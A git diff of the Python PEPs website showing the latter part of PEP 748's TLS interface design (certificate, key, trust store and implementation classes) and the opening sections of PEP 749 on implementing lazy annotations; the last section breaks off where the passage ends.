+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> Certificate:
+        """
+        Creates a Certificate object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN CERTIFICATE" and another
+        series of dashes). In the absence of that preamble, the
+        implementation may assume that the certificate is DER-encoded
+        instead.
+        """
+        return cls(buffer=buffer)
+
+    @classmethod
+    def from_file(cls, path: os.PathLike[str]) -> Certificate:
+        """
+        Creates a Certificate object from a file on disk. The file on disk
+        should contain a series of bytes corresponding to a certificate that
+        may be either PEM-encoded or DER-encoded. If the bytes are PEM encoded
+        it *must* begin with the standard PEM preamble (a series of dashes
+        followed by the ASCII bytes "BEGIN CERTIFICATE" and another series of
+        dashes). In the absence of that preamble, the implementation may
+        assume that the certificate is DER-encoded instead.
+        """
+        return cls(path=path)
+
+    @classmethod
+    def from_id(cls, id: bytes) -> Certificate:
+        """
+        Creates a Certificate object from an arbitrary identifier. This may
+        be useful for implementations that rely on system certificate stores.
+        """
+        return cls(id=id)
+
+
+
+
+

Private Keys

+

This module would define a concrete private key class. Much like the +Certificate class, this class has three attributes to correspond to the +three constructors, and further has all the caveats of the Certificate +class.

+
class PrivateKey:
+    """Object representing a private key corresponding to a public key
+    for a certificate used in TLS."""
+
+    __slots__ = (
+        "_buffer",
+        "_path",
+        "_id",
+    )
+
+    def __init__(
+        self, buffer: bytes | None = None, path: os.PathLike | None = None, id: bytes | None = None
+    ):
+        """
+        Creates a PrivateKey object from a path, buffer, or ID.
+
+        If none of these is given, an exception is raised.
+        """
+
+        if buffer is None and path is None and id is None:
+            raise ValueError("PrivateKey cannot be empty.")
+
+        self._buffer = buffer
+        self._path = path
+        self._id = id
+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> PrivateKey:
+        """
+        Creates a PrivateKey object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN", the key type, and
+        another series of dashes). In the absence of that preamble, the
+        implementation may assume that the private key is DER-encoded
+        instead.
+        """
+        return cls(buffer=buffer)
+
+    @classmethod
+    def from_file(cls, path: os.PathLike) -> PrivateKey:
+        """
+        Creates a PrivateKey object from a file on disk. The file on disk
+        should contain a series of bytes corresponding to a certificate that
+        may be either PEM-encoded or DER-encoded. If the bytes are PEM encoded
+        it *must* begin with the standard PEM preamble (a series of dashes
+        followed by the ASCII bytes "BEGIN", the key type, and another series
+        of dashes). In the absence of that preamble, the implementation may
+        assume that the certificate is DER-encoded instead.
+        """
+        return cls(path=path)
+
+    @classmethod
+    def from_id(cls, id: bytes) -> PrivateKey:
+        """
+        Creates a PrivateKey object from an arbitrary identifier. This may
+        be useful for implementations that rely on system private key stores.
+        """
+        return cls(id=id)
+
+
+
+
+

Signing Chain

+

In order to authenticate themselves, TLS participants need to provide a leaf +certificate with a chain leading up to some root certificate that is trusted by +the other side. Servers always need to authenticate themselves to clients, but +clients can also authenticate themselves to servers during client +authentication. Additionally, the leaf certificate must be accompanied by a +private key, which can either be stored in a separate object, or together with +the leaf certificate itself. This module defines the collection of these objects +as a SigningChain as detailed below:

+
class SigningChain:
+    """Object representing a certificate chain used in TLS."""
+
+    leaf: tuple[Certificate, PrivateKey | None]
+    chain: list[Certificate]
+
+    def __init__(
+        self,
+        leaf: tuple[Certificate, PrivateKey | None],
+        chain: Sequence[Certificate] | None = None,
+    ):
+        """Initializes a SigningChain object."""
+        self.leaf = leaf
+        if chain is None:
+            chain = []
+        self.chain = list(chain)
+
+
+

As shown in the configuration classes above, a client can have one signing chain +in the case of client authentication or none otherwise. A server can have a +sequence of signing chains, which is useful when it is responsible for multiple +domains.

+
+
+

Trust Store

+

As discussed above, loading a trust store represents an issue because different +TLS implementations vary wildly in how they allow users to select trust stores. +For this reason, we need to provide a model that assumes very little about the +form that trust stores take.

+

This problem is the same as the one that the Certificate and PrivateKey +types need to solve. For this reason, we use the exact same model, by creating a +concrete class that captures the various means of how users could define a trust +store.

+

A given TLS implementation is not required to handle all possible trust stores. +However, it is strongly recommended that a given TLS implementation handles the +system constructor if at all possible, as this is the most common validation +trust store that is used. TLS implementations can communicate unsupported +options as described in the “Runtime” section below.

+
class TrustStore:
+    """
+    The trust store that is used to verify certificate validity.
+    """
+
+    __slots__ = (
+        "_buffer",
+        "_path",
+        "_id",
+    )
+
+    def __init__(
+        self, buffer: bytes | None = None, path: os.PathLike | None = None, id: bytes | None = None
+    ):
+        """
+        Creates a TrustStore object from a path, buffer, or ID.
+
+        If none of these is given, the default system trust store is used.
+        """
+
+        self._buffer = buffer
+        self._path = path
+        self._id = id
+
+    @classmethod
+    def system(cls) -> TrustStore:
+        """
+        Returns a TrustStore object that represents the system trust
+        database.
+        """
+        return cls()
+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> TrustStore:
+        """
+        Initializes a trust store from a buffer of PEM-encoded certificates.
+        """
+        return cls(buffer=buffer)
+
+    @classmethod
+    def from_file(cls, path: os.PathLike) -> TrustStore:
+        """
+        Initializes a trust store from a single file containing PEMs.
+        """
+        return cls(path=path)
+
+    @classmethod
+    def from_id(cls, id: bytes) -> TrustStore:
+        """
+        Initializes a trust store from an arbitrary identifier.
+        """
+        return cls(id=id)
+
+
+
+
+

Runtime Access

+

A not-uncommon use case is for library users to want to specify the TLS +implementation to use while allowing the library to configure the details of the +actual TLS connection. For example, users of requests may want to be +able to select between OpenSSL or a platform-native solution on Windows and +macOS, or between OpenSSL and NSS on some Linux platforms. These users, however, +may not care about exactly how their TLS configuration is done.

+

This poses two problems: given an arbitrary concrete implementation, how can a +library:

+
    +
  • Work out whether the implementation supports particular constructors for certificates +or trust stores (e.g. from arbitrary identifiers)?
  • +
  • Get the correct types for the two context classes?
  • +
+

Constructing certificate and trust store objects should be possible outside of +the implementation. Therefore, the implementations need to provide a way for +users to verify whether the implementation is compatible with user-constructed +certificates and trust stores. Therefore, each implementation should implement a +validate_config method that takes a TLSClientConfiguration or +TLSServerConfiguration object and raises an exception if unsupported +constructors were used.

+

For the types, there are two options: either all concrete implementations can be +required to fit into a specific naming scheme, or we can provide an API that +makes it possible to grab these objects.

+

This PEP proposes that we use the second approach. This grants the greatest +freedom to concrete implementations to structure their code as they see fit, +requiring only that they provide a single object that has the appropriate +properties in place. Users can then pass this implementation object to libraries +that support it, and those libraries can take care of configuring and using the +concrete implementation.

+

All concrete implementations must provide a method of obtaining a +TLSImplementation object. The TLSImplementation object can be a global +singleton or can be created by a callable if there is an advantage in doing +that.

+

The TLSImplementation object has the following definition:

+
class TLSImplementation(Generic[_ClientContext, _ServerContext]):
+    __slots__ = (
+        "_client_context",
+        "_server_context",
+        "_validate_config",
+    )
+
+    def __init__(
+        self,
+        client_context: type[_ClientContext],
+        server_context: type[_ServerContext],
+        validate_config: Callable[[TLSClientConfiguration | TLSServerConfiguration], None],
+    ) -> None:
+        self._client_context = client_context
+        self._server_context = server_context
+        self._validate_config = validate_config
+
+
+

The first two properties must provide the concrete implementation of the +relevant Protocol class. For example, for the client context:

+
@property
+def client_context(self) -> type[_ClientContext]:
+    """The concrete implementation of the PEP 543 Client Context object,
+    if this TLS implementation supports being the client on a TLS connection.
+    """
+    return self._client_context
+
+
+

This ensures that code like this will work for any implementation:

+
client_config = TLSClientConfiguration()
+client_context = implementation.client_context(client_config)
+
+
+

The third property must provide a function that verifies whether a given TLS +configuration contains implementation-compatible certificates, private keys, and +a trust store:

+
@property
+def validate_config(self) -> Callable[[TLSClientConfiguration | TLSServerConfiguration], None]:
+    """A function that reveals whether this TLS implementation supports a
+    particular TLS configuration.
+    """
+    return self._validate_config
+
+
+

Note that this function only needs to verify that supported constructors were +used for the certificates, private keys, and trust store. It does not need to +parse or retrieve the objects to validate them further.

+
+
+
+

Insecure Usage

+

All of the above assumes that users want to use the module in a secure way. +Sometimes, users want to do imprudent things like disable certificate validation +for testing purposes. To this end, we propose a separate insecure module +that allows users to do this. This module contains insecure variants of the +configuration, context, and implementation objects, which allow to disable +certificate validation as well as the server hostname check.

+

This functionality is placed in a separate module to make it as hard as possible +for legitimate users to accidentally use the insecure functionality. +Additionally, it defines a new warning called SecurityWarning, and loudly +warns at every step of the way when trying to create an insecure connection.

+

This module is only intended for testing purposes. In real-world situations +where a user wants to connect to some IoT device which only has a self-signed +certificate, it is strongly recommended to add this certificate into a custom +trust store, rather than using the insecure module to disable certificate +validation.

+
+
+
+

Changes to the Standard Library

+

The portions of the standard library that interact with TLS should be revised to +use these Protocol classes. This will allow them to function with other TLS +implementations. This includes the following modules:

+ +
+

Migration of the ssl module

+

Naturally, we will need to extend the ssl module itself to conform to +these Protocol classes. This extension will take the form of new classes, +potentially in an entirely new module. This will allow applications that take +advantage of the current ssl module to continue to do so, while enabling +the new APIs for applications and libraries that want to use them.

+

In general, migrating from the ssl module to the new Protocol classes is +not expected to be one-to-one. This is normally acceptable: most tools that use +the ssl module hide it from the user, and so refactoring to use the new +module should be invisible.

+

However, a specific problem comes from libraries or applications that leak +exceptions from the ssl module, either as part of their defined API or by +accident (which is easily done). Users of those tools may have written code that +tolerates and handles exceptions from the ssl module being raised: +migrating to the protocol classes presented here would potentially cause the +exceptions defined above to be thrown instead, and existing except blocks +will not catch them.

+

For this reason, part of the migration of the ssl module would require +that the exceptions in the ssl module alias those defined above. That is, +they would require the following statements to all succeed:

+
assert ssl.SSLError is tls.TLSError
+assert ssl.SSLWantReadError is tls.WantReadError
+assert ssl.SSLWantWriteError is tls.WantWriteError
+
+
+

The exact mechanics of how this will be done are beyond the scope of this PEP, +as they are made more complex due to the fact that the current ssl exceptions +are defined in C code, but more details can be found in an email sent to the +Security-SIG by Christian Heimes.

+
+
+
+

Future

+

Major future TLS features may require revisions of these protocol classes. These +revisions should be made cautiously: many implementations may not be able to +move forward swiftly, and will be invalidated by changes in these protocol +classes. This is acceptable, but wherever possible features that are specific to +individual implementations should not be added to the protocol classes. The +protocol classes should restrict themselves to high-level descriptions of +IETF-specified features.

+

However, well-justified extensions to this API absolutely should be made. The +focus of this API is to provide a unifying lowest-common-denominator +configuration option for the Python community. TLS is not a static target, and +as TLS evolves so must this API.

+
+
+

Credits

+

This PEP is adapted substantially from PEP 543, which was withdrawn in 2020. +PEP 543 was authored by Cory Benfield and Christian Heimes, and received +extensive review from a number of individuals in the community who have +substantially helped shape it. Detailed review for both PEP 543 and this +PEP was provided by:

+
    +
  • Alex Chan
  • +
  • Alex Gaynor
  • +
  • Antoine Pitrou
  • +
  • Ashwini Oruganti
  • +
  • Donald Stufft
  • +
  • Ethan Furman
  • +
  • Glyph
  • +
  • Hynek Schlawack
  • +
  • Jim J Jewett
  • +
  • Nathaniel J. Smith
  • +
  • Alyssa Coghlan
  • +
  • Paul Kehrer
  • +
  • Steve Dower
  • +
  • Steven Fackler
  • +
  • Wes Turner
  • +
  • Will Bond
  • +
  • Cory Benfield
  • +
  • Marc-André Lemburg
  • +
  • Seth M. Larson
  • +
  • Victor Stinner
  • +
  • Ronald Oussoren
  • +
+

Further review of PEP 543 was provided by the Security-SIG and python-ideas +mailing lists.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0748.rst

+

Last modified: 2024-12-09 02:51:16 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0749/index.html b/pep-0749/index.html new file mode 100644 index 00000000000..f8f56e06b4e --- /dev/null +++ b/pep-0749/index.html @@ -0,0 +1,1123 @@ + + + + + + + + PEP 749 – Implementing PEP 649 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 749 – Implementing PEP 649

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Requires:
+
649
+
Created:
+
28-May-2024
+
Python-Version:
+
3.14
+
Post-History:
+
04-Jun-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP supplements PEP 649 by providing various tweaks and additions to its +specification:

+
    +
  • from __future__ import annotations (PEP 563) will continue to exist with +its current behavior at least until Python 3.13 reaches its end-of-life. Subsequently, +it will be deprecated and eventually removed.
  • +
  • A new standard library module, annotationlib, is added to provide tooling for +annotations. It will include the get_annotations() function, an enum for annotation +formats, a ForwardRef class, and a helper function for calling __annotate__ functions.
  • +
  • Annotations in the REPL are lazily evaluated, just like other module-level annotations.
  • +
  • We specify the behavior of wrapper objects that provide annotations, such as classmethod() +and code that uses functools.wraps().
  • +
  • There will not be a code flag for marking __annotate__ functions +that can be run in a “fake globals” environment. Instead, we add a fourth format, +VALUE_WITH_FAKE_GLOBALS, to allow third-party implementors of annotate functions to +indicate what formats they support.
  • +
  • Deleting the __annotations__ attribute directly will also clear __annotate__.
  • +
  • We add functionality to allow evaluating type alias values and type parameter bounds and defaults +(which were added by PEP 695 and PEP 696) using PEP 649-like semantics.
  • +
  • The SOURCE format is renamed to STRING to improve clarity and reduce the risk of +user confusion.
  • +
+
+
+

Motivation

+

PEP 649 provides an excellent framework for creating better semantics for +annotations in Python. It solves a common pain point for users of annotations, +including those using static type hints as well as those using runtime typing, +and it makes the language more elegant and powerful. +The PEP was originally proposed in 2021 for Python 3.10, +and it was accepted in 2023. However, the implementation took longer than anticipated, +and now the PEP is expected to be implemented in Python 3.14.

+

I have started working on the implementation of the PEP in CPython. I found that +the PEP leaves some areas underspecified, and some +of its decisions in corner cases are questionable. This new PEP proposes several +changes and additions to the specification to address these issues.

+

This PEP supplements rather than supersedes PEP 649. The changes proposed here +should make the overall user experience better, but they do not change the +general framework of the earlier PEP.

+
+
+

The future of from __future__ import annotations

+

PEP 563 previously introduced the future import from __future__ import annotations, +which changes all annotations to strings. PEP 649 proposes an alternative approach +that does not require this future import, and states:

+
+
If this PEP is accepted, PEP 563 will be deprecated and eventually removed.
+

However, the PEP does not provide a detailed plan for this deprecation.

+

There is some previous discussion of this topic on Discourse +(note that in the linked post I proposed something different from what is proposed here).

+
+

Specification

+

We suggest the following deprecation plan:

+
    +
  • In Python 3.14, from __future__ import annotations will continue to work as it +did before, converting annotations into strings.
      +
    • If the future import is active, the __annotate__ function of objects with +annotations will return the annotations as strings when called with the VALUE +format, reflecting the behavior of __annotations__.
    • +
    +
  • +
  • Sometime after the last release that did not support PEP 649 semantics (expected to be 3.13) +reaches its end-of-life, from __future__ import annotations is deprecated. Compiling +any code that uses the future import will emit a DeprecationWarning. This will +happen no sooner than the first release after Python 3.13 reaches its end-of-life, but +the community may decide to wait longer.
  • +
  • After at least two releases, the future import is removed, and annotations are always +evaluated as per PEP 649. Code that continues to use the future import will raise +a SyntaxError, similar to any other undefined future import.
  • +
+
+
+

Rejected alternatives

+

Immediately make the future import a no-op: We considered applying PEP 649 semantics +to all code in Python 3.14, making the future import a no-op. However, this would break +code that works in 3.13 under the following set of conditions:

+
    +
  • __future__ import annotations is active
  • +
  • There are annotations that rely on forward references
  • +
  • Annotations are eagerly evaluated at import time, for example by a metaclass or +class or function decorator. For example, this currently applies to the +released version of typing_extensions.TypedDict.
  • +
+

This is expected to be a common pattern, so we cannot afford to break such code during +the upgrade from 3.13 to 3.14.

+

Such code would still break when the future import is eventually removed. However, this +is many years in the future, giving affected decorators plenty of time to update their code.

+

Immediately deprecate the future import: Instead of waiting until Python 3.13 reaches +its end-of-life, we could immediately start emitting warnings when the future import is +used. However, many libraries are already using from __future__ import annotations as +an elegant way to enable unrestricted forward references in their annotations. If we deprecate +the future import immediately, it would be impossible for these libraries to use unrestricted +forward references on all supported Python versions while avoiding deprecation warnings: +unlike other features deprecated from the standard library, a __future__ import must +be the first statement in a given module, meaning it would be impossible to only +conditionally import __future__.annotations on Python 3.13 and lower. (The necessary +sys.version_info check would count as a statement preceding the __future__ import.)

+

Keep the future import around forever: We could also decide to keep the future import +indefinitely. However, this would permanently bifurcate the behavior of the Python +language. This is undesirable; the language should have only a single set of semantics, +not two permanently different modes.

+

Make the future import a no-op in the future: Instead of eventually making +from __future__ import annotations a SyntaxError, we could make it do nothing +instead at some point after Python 3.13 reaches its end-of-life. This still has some +of the same issues outlined above around making it a no-op now, although the ecosystem +would have had much longer to adapt. It is better to have users explicitly remove +the future import from their code in the future once they have confirmed they do not +rely on stringized annotations.

+
+
+
+

New annotationlib module

+

PEP 649 proposes to add tooling related to annotations to the inspect +module. However, that module is rather large, has direct or indirect dependencies +on at least 35 other standard library modules, and is so slow to import that other +standard library modules are often discouraged from importing it. Furthermore, we +anticipate adding more tools in addition to the inspect.get_annotations() +function and the VALUE, FORWARDREF, and SOURCE formats.

+

A new standard library module provides a logical home for this functionality and +also enables us to add more tooling that is useful for consumers of annotations.

+
+

Rationale

+

PEP 649 indicates that typing.ForwardRef should be used to implement the +FORWARDREF format in inspect.get_annotations(). However, the existing implementation +of typing.ForwardRef is intertwined with the rest of the typing module, +and it would not make sense to add typing-specific behavior to the generic get_annotations() +function. Furthermore, typing.ForwardRef is a problematic +class: it is public and documented, but the documentation lists no attributes or methods +for it. Nonetheless, third-party libraries make use of some of its undocumented +attributes. For instance, Pydantic +and Typeguard +use the _evaluate method; beartype +and pyanalyze +use the __forward_arg__ attribute.

+

We replace the existing but poorly specified typing.ForwardRef with a new class, +annotationlib.ForwardRef. It is designed to be mostly compatible with existing uses +of the typing.ForwardRef class, but without the behaviors specific to the +typing module. For compatibility with existing users, we keep the private +_evaluate method, but mark it as deprecated. It delegates to a new public function in +the typing module, typing.evaluate_forward_ref, that is designed to +evaluate forward references in a way that is specific to type hints.

+

We add a function annotationlib.call_annotate_function as a helper for calling +__annotate__ functions. This is a useful building block when implementing functionality +that needs to partially evaluate annotations while a class is being constructed. +For example, the implementation of typing.NamedTuple needs to retrieve +the annotations from a class namespace dictionary before the namedtuple class itself +can be constructed, because the annotations determine what fields exist on the namedtuple.

+
+
+

Specification

+

A new module, annotationlib, is added to the standard library. Its aim is to +provide tooling for introspecting and wrapping annotations.

+

The exact contents of the module are not yet specified. We will add support for +PEP 649 semantics to standard library functionality that uses annotations, such +as dataclasses and typing.TypedDict, and use the experience +to inform the design of the new module.

+

The module will contain the following functionality:

+
    +
  • get_annotations(): A function that returns the annotations of a function, +module, or class. This will replace inspect.get_annotations(). The latter +will delegate to the new function. It may eventually be deprecated, but to +minimize disruption, we do not propose an immediate deprecation.
  • +
  • get_annotate_function(): A function that returns the __annotate__ function +of an object, if it has one, or None if it does not. This is usually equivalent +to accessing the .__annotate__ attribute, except in the presence of metaclasses +(see below).
  • +
  • Format: an enum that contains the possible formats of annotations. This will +replace the VALUE, FORWARDREF, and SOURCE formats in PEP 649. +PEP 649 proposed to make these values global members of the inspect +module; we prefer to place them within an enum. We propose to add a fourth format, +VALUE_WITH_FAKE_GLOBALS (see below).
  • +
  • ForwardRef: a class representing a forward reference; it may be returned by +get_annotations() when the format is FORWARDREF. The existing class +typing.ForwardRef will become an alias of this class. Its members include:
      +
    • __forward_arg__: the string argument of the forward reference
    • +
    • evaluate(globals=None, locals=None, type_params=None, owner=None): a method that attempts to evaluate +the forward reference. The ForwardRef object may hold a reference to the +globals and other namespaces of the object that it originated from. If so, these +namespaces may be used to evaluate the forward reference. The owner argument +may be the object that holds the original annotation, such as the class or module +object; it is used to extract the globals and locals namespaces if these are not +provided.
    • +
    • _evaluate(), with the same interface as the existing ForwardRef._evaluate +method. It will be undocumented and immediately deprecated. It is provided for +compatibility with existing users of typing.ForwardRef.
    • +
    +
  • +
  • call_annotate_function(func: Callable, format: Format): a helper for calling +an __annotate__ function with a given format. If the function does not support +this format, call_annotate_function() will set up a “fake globals” environment, +as described in PEP 649, and use that environment to return the desired annotations +format.
  • +
  • call_evaluate_function(func: Callable | None, format: Format): similar to +call_annotate_function, but does not rely on the function returning an annotations +dictionary. This is intended to be used for evaluating deferred attributes introduced by +PEP 695 and PEP 696; see below for details. func may be None +for convenience; if None is passed, the function also returns None.
  • +
  • annotations_to_string(annotations: dict[str, object]) -> dict[str, str]: a function that +converts each value in an annotations dictionary to a string representation. +This is useful for +implementing the SOURCE format in cases where the original source is not available, +such as in the functional syntax for typing.TypedDict.
  • +
  • value_to_string(value: object) -> str: a function that converts a single value to a +string representation. This is used by annotations_to_string. +It uses repr() for most values, but for types it returns the fully qualified name. +It is also useful as a helper for the repr() of a number of objects in the +typing and collections.abc modules.
  • +
+

A new function is also added to the typing module, typing.evaluate_forward_ref. +This function is a wrapper around the ForwardRef.evaluate method, but it performs +additional work that is specific to type hints. For example, it recurses into complex +types and evaluates additional forward references within these types.

+

Contrary to PEP 649, the annotation formats (VALUE, FORWARDREF, and SOURCE) +will not be added as global members of the inspect module. The only recommended +way to refer to these constants will be as annotationlib.Format.VALUE.

+
+
+

Open issues

+

What should this module be called? Some ideas:

+
    +
  • annotations: The most obvious name, but it may cause confusion with the existing +from __future__ import annotations, because users may have both import annotations +and from __future__ import annotations in the same module. The use of a common word +as the name will make the module harder to search for. There is a PyPI package annotations, +but it had only a single release in 2015 and looks abandoned.
  • +
  • annotation (in the singular): Similar, but does not cause confusion with the future +import. There is an abandoned PyPI package annotation, but it apparently never +released any artifacts.
  • +
  • annotools: Analogous to itertools and functools, but “anno” is a less +obvious abbreviation than “iter” or “func”. As of this writing, there +is no PyPI package with this name.
  • +
  • annotationtools: A more explicit version. There is a PyPI package +annotationtools, which had a release in 2023.
  • +
  • annotation_tools: A variation of the above but without a PyPI conflict. However, +no other public standard library module has an underscore in its name.
  • +
  • annotationslib: Analogous to tomllib, pathlib, and importlib. +There is no PyPI package with this name.
  • +
  • annotationlib: Similar to the above, but one character shorter and subjectively reads +better. Also not taken on PyPI.
  • +
+
+
+

Rejected alternatives

+

Add the functionality to the inspect module: As described above, the +inspect module is already quite large, and its import time is prohibitive +for some use cases.

+

Add the functionality to the typing module: While annotations are mostly +used for typing, they may also be used for other purposes. We prefer to keep a clean +separation between functionality for introspecting annotations and functionality that +is exclusively meant for type hints.

+

Add the functionality to the types module: The types module is +meant for functionality related to types, and annotations can exist on functions +and modules, not only on types.

+

Develop this functionality in a third-party package: The functionality in this new +module will be pure Python code, and it is possible to implement a third-party package +that provides the same functionality by interacting directly with __annotate__ +functions generated by the interpreter. However, the functionality of the proposed new +module will certainly be useful in the standard library itself (e.g., for implementing +dataclasses and typing.NamedTuple), so it makes sense to include +it in the standard library.

+

Add this functionality to a private module: It would be possible to initially develop +the module in a private standard library module (e.g., _annotations), and publicize +it only after we have gained more experience with the API. However, we already know +that we will need parts of this module for the standard library itself (e.g., for +implementing dataclasses and typing.NamedTuple). Even if we make +it private, the module will inevitably get used by third-party users. It is preferable +to start with a clear, documented API from the beginning, to enable third-party users to +support PEP 649 semantics as thoroughly as the standard library. The module will +immediately be used in other parts of the standard library, ensuring that it covers a +reasonable set of use cases.

+
+
+
+

Behavior of the REPL

+

PEP 649 specifies the following behavior of the interactive REPL:

+
+
For the sake of simplicity, in this case we forego delayed evaluation. +Module-level annotations in the REPL shell will continue to work exactly +as they do with “stock semantics”, evaluating immediately and setting the +result directly inside the __annotations__ dict.
+

There are several problems with this proposed behavior. It makes the REPL the +only context where annotations are still evaluated immediately, which is +confusing for users and complicates the language.

+

It also makes the implementation of the REPL more complex, as it needs to +ensure that all statements are compiled in “interactive” mode, even if their +output does not need to be displayed. (This matters if there are multiple +statements in a single line evaluated by the REPL.)

+

Most importantly, this breaks some plausible use cases that inexperienced +users could run into. A user might write the following in a file:

+
a: X | None = None
+class X: ...
+
+
+

Under PEP 649 this would work fine: X is not yet defined when it is used +in the annotation for a, but the annotation is lazily evaluated. However, +if a user were to paste this same code into the REPL and execute it line by +line, it would throw a NameError, because the name X is not yet defined.

+

This topic was previously discussed on Discourse.

+
+

Specification

+

We propose to treat the interactive console like any other module-level code, and +make annotations lazily evaluated. This makes the language more consistent and +avoids subtle behavior changes between modules and the REPL.

+

Because the REPL is evaluated line by line, we would generate a new __annotate__ +function for every evaluated statement in the global scope that contains annotations. Whenever a line +containing annotations is evaluated, the previous __annotate__ function is +lost:

+
>>> x: int
+>>> __annotate__(1)
+{'x': <class 'int'>}
+>>> y: str
+>>> __annotate__(1)
+{'y': <class 'str'>}
+>>> z: doesntexist
+>>> __annotate__(1)
+Traceback (most recent call last):
+File "<python-input-5>", line 1, in <module>
+    __annotate__(1)
+    ~~~~~~~~~~~~^^^
+File "<python-input-4>", line 1, in __annotate__
+    z: doesntexist
+       ^^^^^^^^^^^
+NameError: name 'doesntexist' is not defined
+
+
+

There will be no __annotations__ key in the global namespace of the REPL. +In module namespaces, this key is created lazily when the __annotations__ +descriptor of the module object is accessed, but in the REPL there is no such module +object.

+

Classes and functions defined within the REPL will also work like any other classes, +so evaluation of their annotations will be deferred. It is possible to access the +__annotations__ and __annotate__ attributes or use the annotationlib module +to introspect the annotations.

+
+
+
+

Wrappers that provide __annotations__

+

Several objects in the standard library and elsewhere provide annotations for their +wrapped object. PEP 649 does not specify how such wrappers should behave.

+
+

Specification

+

Wrappers that provide annotations should be designed with the following goals +in mind:

+
    +
  • Evaluation of __annotations__ should be deferred for as long as possible, +consistent with the behavior of built-in functions, classes, and modules.
  • +
  • Backward compatibility with the behavior prior to the implementation of PEP 649 +should be preserved.
  • +
  • The __annotate__ and __annotations__ attributes should both be supplied +with semantics consistent to those of the wrapped object.
  • +
+

More specifically:

+
    +
  • functools.update_wrapper() (and therefore functools.wraps()) +will copy only the __annotate__ attribute +from the wrapped object to the wrapper. The __annotations__ descriptor on the +wrapper function will use the copied __annotate__.
  • +
  • The constructors for classmethod() and staticmethod() currently +copy the __annotations__ attribute from the wrapped object to the wrapper. +They will instead have writable attributes for +__annotate__ and __annotations__. Reading these attributes will retrieve +the corresponding attribute from the underlying callable and cache it in the wrapper’s +__dict__. Writing to these attributes will directly update the __dict__, +without affecting the wrapped callable.
  • +
+
+
+
+

Annotations and metaclasses

+

Testing of the initial implementation of this PEP revealed serious problems with +the interaction between metaclasses and class annotations.

+
+

Pre-existing bugs

+

We found several bugs in the existing behavior of __annotations__ on classes +while investigating the behaviors to be specified in this PEP. Fixing these bugs +on Python 3.13 and earlier is outside the scope of this PEP, but they are noted here +to explain the corner cases that need to be dealt with.

+

For context, on Python 3.10 through 3.13 the __annotations__ dictionary is +placed in the class namespace if the class has any annotations. If it does not, +there is no __annotations__ class dictionary key when the class is created, +but accessing cls.__annotations__ invokes a descriptor defined on type +that returns an empty dictionary and stores it in the class dictionary. +Static types are an exception: they never have +annotations, and accessing .__annotations__ raises AttributeError. +On Python 3.9 and earlier, the behavior was different; see +gh-88067.

+

The following code fails identically on Python 3.10 through 3.13:

+
class Meta(type): pass
+
+class X(metaclass=Meta):
+    a: str
+
+class Y(X): pass
+
+Meta.__annotations__  # important
+assert Y.__annotations__ == {}, Y.__annotations__  # fails: {'a': <class 'str'>}
+
+
+

If the annotations on the metaclass Meta are accessed before the annotations +on Y, then the annotations for the base class X are leaked to Y. +However, if the metaclass’s annotations are not accessed (i.e., the line Meta.__annotations__ +above is removed), then the annotations for Y are correctly empty.

+

Similarly, annotations from annotated metaclasses leak to unannotated +classes that are instances of the metaclass:

+
class Meta(type):
+    a: str
+
+class X(metaclass=Meta):
+    pass
+
+assert X.__annotations__ == {}, X.__annotations__  # fails: {'a': <class 'str'>}
+
+
+

The reason for these behaviors is that if the metaclass contains an +__annotations__ entry in its class dictionary, this prevents +instances of the metaclass from using the __annotations__ data descriptor +on the base type class. In the first case, accessing Meta.__annotations__ +sets Meta.__dict__["__annotations__"] = {} as a side effect. Then, looking +up the __annotations__ attribute on Y first sees the metaclass attribute, +but skips it because it is a data descriptor. Next, it looks in the class dictionaries +of the classes in its method resolution order (MRO), finds X.__annotations__, +and returns it. In the second example, there are no annotations +anywhere in the MRO, so type.__getattribute__ falls back to +returning the metaclass attribute.

+
+
+

Metaclass behavior with PEP 649

+

With PEP 649, the behavior of accessing the .__annotations__ attribute +on classes when metaclasses are involved becomes even more erratic, because now +__annotations__ is only lazily added to the class dictionary even for classes +with annotations. The new __annotate__ attribute is also lazily created +on classes without annotations, which causes further misbehaviors when +metaclasses are involved.

+

The cause of these problems is that we set the __annotate__ and __annotations__ +class dictionary entries only under some circumstances, and rely on descriptors +defined on type to fill them in if they are not set. When normal +attribute lookup is used, this approach breaks down in the presence of +metaclasses, because entries in the metaclass’s own class dictionary can render +the descriptors invisible.

+

While we considered several approaches that would allow cls.__annotations__ +and cls.__annotate__ to work reliably when cls is a type with a custom +metaclass, any such approach would expose significant complexity to advanced users. +Instead, we recommend a simpler approach that confines the complexity to the +annotationlib module: in annotationlib.get_annotations, we bypass normal +attribute lookup by using the type.__annotations__ descriptor directly.

+
+
+

Specification

+

Users should always use annotationlib.get_annotations to access the +annotations of a class object, and annotationlib.get_annotate_function +to access the __annotate__ function. These functions will return only +the class’s own annotations, even when metaclasses are involved.

+

The behavior of accessing the __annotations__ and __annotate__ +attributes on classes with a metaclass other than builtins.type is +unspecified. The documentation should warn against direct use of these +attributes and recommend using the annotationlib module instead.

+

Similarly, the presence of __annotations__ and __annotate__ keys +in the class dictionary is an implementation detail and should not be relied +upon.

+
+
+

Rejected alternatives

+

We considered two broad approaches for dealing with the behavior +of the __annotations__ and __annotate__ entries in classes:

+
    +
  • Ensure that the entry is always present in the class dictionary, even if it +is empty or has not yet been evaluated. This means we do not have to rely on +the descriptors defined on type to fill in the field, and +therefore the metaclass’s attributes will not interfere. (Prototype +in gh-120719.)
  • +
